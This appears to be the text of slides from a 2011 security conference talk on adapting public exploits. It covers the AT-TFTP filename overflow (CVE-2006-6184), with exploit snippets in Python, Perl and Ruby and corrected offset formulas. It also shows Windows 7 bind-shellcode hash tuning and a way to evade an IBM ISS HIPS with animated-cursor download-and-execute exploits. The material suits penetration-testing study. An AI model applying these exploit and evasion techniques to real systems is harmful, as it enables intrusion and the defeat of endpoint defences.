Customizing Public Exploits

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Hacktivity 2011 Pter Gara-Tarnczi

Previously on ...: Offsec PWB + Hacktivity 2009 Prerequisites: stack buffer overflow + Windows shellcodes + script languages + x86 Assembly

Inspiration & Idea & Sources

Several exploits that I could get from the Internet didnt work when I tested on vulnerable systems. I needed to modify their code to hack those systems successfully. Some exploits were accidentally buggy or intentionally limited, others supported different versions of Windows except for that one I had. I realized that I could categorize problems and had found cases for those categories. I thought that I would make a presentation based on case studies to introduce some of them. Two information sources provided material for my research:

Lab practices of Offensive Securitys Penetration Testing with BackTrack course My own presentation, Windows Shellcodes in Malware, on Hacktivity 2009

Some of Problem Categories

Buggy codes: they work only if special conditions meet. I think they are created debugging in one environment without the deep knowledge of vulnerability details. Portability problems: exploits work on different operating system versions apart from that one you test on. Security evasion: code needs to evade a line of defense.

Expected knowledge


knowledge about stack buffer overflow exploits Basic knowledge about shellcodes


knowledge about x86 Assembly Basic knowledge about script languages (Perl, Python, Ruby)

Case Study I: Buggy Exploits

AT-TFTP Server Long Filename Buffer Overflow CVE-2006-6184 Exploits: Cervini , qnix , Webster ()

CS1: AT-TFTP Server Long Filename BO

2006: Liu Qixu and Zhang Yuqing developed a fuzzer to find overflows in free TFTP applications. Qixu announced a stack buffer overflow vulnerability in Allied Telesyn TFTP Server version 1.9 on Bugtraq list. 2007: they published results of their research in a paper. Its title was TFTP Vulnerability Exploiting Technique Based on Fuzzing, abstract was also English, other text was Chinese. Official source:

CS1: Protocol Basics

TFTP clients can read (GET) a file from and write (PUT) a file to a TFTP server. GET command: 00 01 [fname] 00 [tmode] 00 PUT command: 00 02 [fname] 00 [tmode] 00 AT-TFTP 1.9 handles filename properly processing network packets but it makes a mistake when it generates a log entry.

CS1: Ordinary Log Entries

CS1: Vulnerability

Logging method uses a fix-sized (256 bytes) local variable to store an entry (without date and time). It executes the following type of C instruction:
wvsprintf(buffer,%s requested to %s file %s in format %s\r\n,clientip,operation,fname,tmode) clientip: e.g. operation: read or write fname: filename tmode: e.g. netascii

An attacker can overflow "buffer" sending a long filename.

CS1: Liu Qixus DoS Exploit (Python)

import socket import sys host = '' port = 69 try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: print "socket() failed" sys.exit(1) filename = "A" * 227 mode = "netascii" data = "\x00\x02" + filename + "\0" + mode + "\0" s.sendto(data, (host, port))

CS1: Controlled Exploitability

CS1: Execution Redirection

Filename has to start with attackers code (read/write packet has limited size) We need to jump based on content of [return address + 4 + 0x28],

should find a call/jmp [esp+0x28] instruction or we should put add esp,0x28 and ret instructions (83 c4 28 c3) behind the return address in the stack and find a call/jmp esp instruction.

CS1: Shellcode Length Calculation

Buffer + EBP 256 + 4 == 260 bytes

[clientip] requested to write file [fname] ...


length(clientip)+25+length(fname to return addr) == 260 length(fname to return addr) == 260 - 25 length(clientip) maximum of length(clientip) == 15 length(fname to return addr) == length (NOPs + shellcode) length(shellcode) = 260 - 25 - 15 = 220 length(clientip) == 260 - 25 - length(NOPs + shellcode)

CS1: Jacopo Cervinis Exploit (Perl)

$pad = "\x90"x63; # win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub $shellcode = "..."; $eip="\xf4\xf5\xe3\x75"; #call [ESP+28] in IMM32.dll on win2k Server SP4 Italian $mode = "netascii"; $exploit = "\x00\x02" . $pad . $shellcode . $eip . "\0" . $mode . "\0";

length(clientip) == 260 - 25 - (63 + 164) == 8 e.g.

CS1: qnixs Exploit (Python)

nops_number1=23-len(host) nops1 = "\x90"*nops_number1 nops_number2 = 210 - len(shellcode) nops2 = "\x90"*nops_number2 buffer = "\x00\x02" + nops1 + nops2 + shellcode + return_address + esp + "\x00" + "netascii" + "\x00"

length(clientip) == 260 - 25 - length(NOPs + shellcode) == 235 - (23 - length(serverip) + 210 length(shellcode) + length(shellcode)) == 235 - 23 + length(serverip) - 210 == length(serverip) + 2 e.g.

CS1: Bugs in Previous Exploits

Cervini: it uses constant length of (NOPs + shellcode) fixes length of clientip

qnix: it uses wrong formula, two modifications needed

25 serverip clientip

CS1: Patrick Websters Exploit (Ruby)

'Payload' => { 'Space' => 210, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, ... sploit = "\x00\x02" + make_nops(25 - datastore['LHOST'].length) sploit << payload.encoded sploit << [target['Ret']].pack('V') # <-- eip = jmp esp. we control it. sploit << "\x83\xc4\x28\xc3" # <-- esp = add esp 0x28 + retn sploit << "\x00" + "netascii" + "\x00"

This Metasploit code uses right formula but there may be problem with one of the return addresses

CS1: Return Addresses of the Exploit

Some contributors extended the list of return addresses in Websters exploit

[ 'Windows NT SP4 English', { 'Ret' ... [ 'Windows XP SP2 English', { 'Ret' [ 'Windows XP SP3 English', { 'Ret' # ret by c0re [ 'Windows Server 2003', { 'Ret' # ret donated by securityxxxpert [ 'Windows Server 2003 SP2', { 'Ret' # ret donated by Polar Bear

'Targets' => [ # Patrick - Tested OK w2k sp0, sp4, xp sp 0, xp sp2 - en 2007/08/24

=> 0x702ea6f7 } ], => 0x71ab9372 } ], => 0x7e429353 } ], => 0x7c86fed3 } ],

=> 0x7c86a01b } ],

CS1: Problem of Return Addresses

Right RAs Win2k3 SP0 w/o hotfixes 0x77fb8bab Win2k3 SP1 w/o hotfixes 0x7c86fed3

I think that guy simply missed right SP level of Windows 2003.

CS1: AT-TFTP Metasploit Demo

Case Study II: Portability

Small Portable Bind Shellcode on Windows 7 Original code: Stuttard, Extended code: SkyLined, Windows 7 Professional compatible code: GTP

CS2: Main Elements of Win Shellcodes

Decoding routine (if encoding is needed to eliminate bad chars) Calculating memory address of system functions
Using hard-coded addresses is not portable Starting with search of kernel32.dll location is much better

Byte sequence search (obsolete) SEH-based (rare but remarkable) PEB-based (usual)

Searching address of GetProcAddress and LoadLibraryA calling them as much as it needed and/or Searching addresses by proper library and function hashes

Calling system functions in expected order

CS2: PEB Technique in Windows 7

before Windows 7 fs:[30h] [eax+0Ch] [eax+1Ch] [eax+8]

mov eax, mov eax, mov esi, lodsd mov ebp,

before and on Windows 7 xor ecx, ecx mov eax, fs:[ecx+30h] mov eax, [eax+0Ch] mov esi, [eax+1Ch] next_module: mov ebp, [esi+08h] mov edi, [esi+20h] mov esi, [esi] cmp [edi+12*2], cl jnz next_module

CS2: Small Portable Win Shellcode

2005: Dafydd Stuttard created a portable bind shellcode for Windows. Its size was 191 bytes. He wrote an article, Writing Small Shellcode, to present the logic behind his code. 2009: Berend-Jan Wever (SkyLined) modified Stuttards shellcode to improve it. One of the relevant improvements was Windows 7 compatibility. Size of shellcode after some optimization was 211 bytes. 2011: I checked SkyLineds code building it into an exploit and experienced that it wasnt compatible to Windows 7 Professional.

CS2: Reducing Hashsize

Windows shellcodes calculate memory addresses of system functions using a simple hash algorithm. It typically generates 4-byte hashes. Stuttard refined an important rule of hashing method:
Basic requirement: It avoids collisions within each library for the specific functions we need to locate. Stuttards rule: We can tolerate hash collisions in the functions we need to locate, provided that we iterate through the exported functions in a defined sequence, and the correct function is the first match against each of our hashes.

Result: Stuttard (and later SkyLined) used 1-byte hashes.

CS2: Hashing Methods



xor edi, edi next_function_loop: inc edi mov esi, [ebx + edi * 4] add esi, ebp cdq hash_loop: lodsb xor al, 0x71 sub dl, al cmp al, 0x71 jne hash_loop cmp dl, [esp + 0x1c] jnz next_function_loop

xor edx, edx next_function_loop: inc edx mov esi, [ecx + edx * 4] add esi, ebp mov ah, hash_start_value hash_loop: lodsb xor al, hash_xor_value sub ah, al cmp al, hash_xor_value jne hash_loop cmp ah, [edi] jnz next_function_loop

CS2: Hashing limitations

1-byte hash several collisions SkyLined generalized the hashing method using two parameters (hash_start_value and hash_xor_value) but made a restriction in order to reduce size of shellcode. He fixed the w character, part of ws2_32 string, as the hash of accept function. This restriction creates dependency between hash_start_value and hash_xor_value. If you choose a XOR value, only one START value is correct. SkyLined used XOR value: 0x71 START value: 0x36 hash(accept) == 0x77 == w

CS2: Necessary system functions

0xb7 LoadLibraryA 0x8f

0x09 WSASocketA 0x98 bind 0x66 listen 0x56 accept 0x77

CS2: Problem in SkyLineds code

CreateProcessA GetModuleHandleExA GetNumaProcessorNodeEx TryAcquireSRWLockShared UnregisterConsoleIME

BaseCheckAppcompatCacheEx LoadLibraryA UnregisterWaitEx ZombifyActCtx

BaseCheckAppcompatCacheEx is not in kernel32.dll on Win7 Release Candidate is in kernel32.dll on Win7 Beta and Win7 Professional Release

CS2: Right Parameter Search

I developed two simple Python scripts


script calculated hash of system functions belong to a dll file 2nd script calculated hash_start_value based on an input hash_xor_value and the accept restriction

I found a few good values that allowed to CreateProcessA and LoadLibraryA be top functions in their own list. Unfortunately, ws2_32 caused another problem...

CS2: Other Params (s:0xb7, x:0xf0)



CreateSymbolicLinkTransactedW GetNumaProcessorNodeEx GetSystemFileCacheSize



LoadAppInitDlls QueryThreadpoolStackInformation


WSAConnect WSARecvDisconnect WSASocketA


WSAStartup WSCInstallNameSpaceEx







CS2: Problem Solution

The only problem is the position of WSASocketA. Why should we use WSASocketA if we have the opportunity to use WSASocketW instead? The ASCII and the Unicode versions of WSASocket are functionally equal and there are no differences between the input parameters. 0x9c


CS2: Code Modification

hash_xor_value hash_start_value hash_kernel32_CreateProcessA hash_kernel32_LoadLibraryA hash_ws2_32_WSAStartup hash_ws2_32_WSASocketA hash_ws2_32_bind hash_ws2_32_listen hash_ws2_32_accept equ equ equ equ equ equ equ equ equ 0xF0 0xB7 0xB3 0x91 0x09 0x9C 0x6A 0x58 0x77

Case Study III: HIPS evasion

IBM ISS Buffer Overflow Exploit Prevention Animated Cursor Buffer Overflow (CVE-2007-0038) Exploits: , Metasploit , GTP I , GTP II

CS3: IBM ISS HIPS Technology

This HIPS has separated network and application defense functionality. Both of them contains three different layers:

defense (firewall, classic IPS, BOEP) Application defense (traditional AV, VPS, application control)

I deal with last line of network defense, Buffer Overflow Exploit Prevention, in this case. Id like to demonstrate how I can evade BOEP.


... IPS agent monitors system calls commonly used by malicious code. By watching the use of Stack and Heap system memory, the agent identifies when a buffer overflow has succeeded and prevents the attacks payload from running. These two sentences are the base of BOEP technology in the mentioned HIPS. Running a rootkit detector application I realized that HIPS hooked three kernel implemented functions:

NtCreateFile NtCreateProcess NtCreateProcessEx

CS3: Concept vs. Implementation

Simple Evasion: exploiting a vulnerability by evasion of the concept, e.g. shellcode execution from another (no stack, no heap) memory area. Case Study I: code runs on data segment. It was tested and really evaded the HIPS. I would have liked to know whether I could create a code that avoid detection by exploiting an implementation bug.

CS3: Article about BOEP Evasion

Jamie Butler, Anonymous I and Anonymous II wrote an article which was published in Phrack magazine No. 62 in 2004. Its title was Bypassing 3rd Party Windows Buffer Overflow Protection. This article contained details about stack backtracing, kernel hooks evasion and userland hooks evasion. Stack backtracing involves traversing stack frames and verifying that the return addresses pass the buffer overflow detection tests... The existing commercial BOPT's kernel components rely entirely on stack backtracing to detect shellcode execution. Therefore, evading a kernel hook is simply a matter of defeating the stack backtracing mechanism.

CS3: Standard function entries

call func1 ... func1: push ebp mov ebp, esp ; ebp points to the top of the stack ... call func2 ... func2: push ebp ; saves top of the previous stack frame mov ebp, esp ; ebp points to the top of the stack ...

CS3: Stack Backtracing

CS3: Vulnerability for Test

Animated Cursor Buffer Overflow (CVE-2007-0038) It was a stack buffer overflow vulnerability. Some specialties:

Existing exploits didnt load the shellcode directly into the stack. Content of the ANI file was loaded to the memory as a mapped file. Smart overwriting of the return address caused execution flow redirection to the shellcode placed on that memory area. Since that memory area was read-only and shellcode used write operations locally, that code contained a routine to copy relevant code to the heap ( and other online exploits) or the stack (Metasploit).

I configured classic IPS component of the HIPS to ignore ANI header overflow and ANI ratenumber DoS events.

CS3: Vulnerability & Exploit

CS3: Exploits for Test

I modified exploit a bit (but not on a bit) poc.ani (ASUS) I used the ANI exploit of Metasploit ani_loadimage_chunksize script (Metasploit) I created a new exploit that loaded the shellcode into the stack in a direct way poc2.ani (GTP I) I modified previous exploit (poc2.ani) that evaded BOEP successfully poc3.ani (GTP II)

CS3: 1st Test

Test exploit ASUS System calls GlobalAlloc LoadLibraryA URLDownloadToCacheFileA CreateProcessA

CS3: 2nd Test

Test exploit
Metasploit System calls

GetProcAddress LoadLibraryA GetSystemDirectoryA URLDownloadToFileA WinExec ExitThread

CS3: Loganalysis of 2nd Test

0013e087: 77e69a00: 77e78b32: 77e526fc: 77f4254d: 7ffe0302:

call [kernel32.dll]WinExec call [kernel32.dll]CreateProcessInternalA call [kernel32.dll]CreateProcessInternalW call [ntdll.dll]ZwCreateProcessEx call 7ffe0300 sysenter

CS3: My Stack Exploit

Basic idea: if you choose a bigger ANIH length, you will be able to load your shellcode directly into the stack. Be careful! Some instructions in the vulnerable user32.dll overwrite two bytes of the shellcode in the stack. These two bytes at a fix (independent on the shellcode) position, so that I should insert a short JMP instruction with a few NOPs to this part of the shellcode. I used standard windows/download_exec shellcode of Metasploit without its XOR encoding.

CS3: 3rd Test

Test exploit
GTP I System calls

GetProcAddress LoadLibraryA GetSystemDirectoryA URLDownloadToFileA WinExec ExitThread

CS3: NtCreateProcessEx???

Did you spot an oddity in the result of these tests? HIPS detected BOEP events in all tests but ... only at NtCreateProcessEx after URLDownloadTo(Cache)FileA created a new file in the system... Since URLDownloadTo(Cache)FileA calls CreateFileA to create a new file, and ... CreateFileA CreateFileW ZwCreateFile NtCreateFile, HIPS should detect a BOEP event, but it misses. URLDownloadTo(Cache)FileA contains several inner call before reaching NtCreateFile. Stack backtracing ceases before reaching original caller. Without an EBP register it is not possible for the buffer overflow detection technologies to accurately perform stack backtracing. Phrack No. 62

CS3: Non-standard function entries

Some functions dont save EBP in the stack. Stack Backtracing can handle this behavior if the value in EBP is not altered by the program code and is stored in the stack later. The result is jumping over some intermediate stack frames and the method finds an earlier one in that case. Modern compilers often omit the use of EBP as a frame pointer and use it as a general purpose register instead. Phrack No. 62 This is a real problem when a security software uses Stack Backtracing. Stack stores a general value executing push ebp.

CS3: My Winner Stack Exploit

Basic idea:choose another execution function that has more complicated calling sequence! [Shell32.dll]ShellExecuteA seemed to be a good choice. I used following parameterized instruction:

CS3: Stack Backtracing Failure

NtCreateProcessEx ZwCreateProcessEx CreateProcessInternalW CreateProcessW Shell32.773955E0 Shell32.773954D5 (no saved EBP!) Shell32.77395000 (no saved EBP!) Shell32.77394F03 Shell32.77395053 ShellExecuteExW ShellExecuteExA ShellExecuteA Stack Backtracing terminates at call of CreateProcessW in shell32.dll.

CS3: 4th Test

Test exploit
GTP II System calls

GetProcAddress LoadLibraryA GetSystemDirectoryA URLDownloadToFileA ShellExecuteA ExitThread



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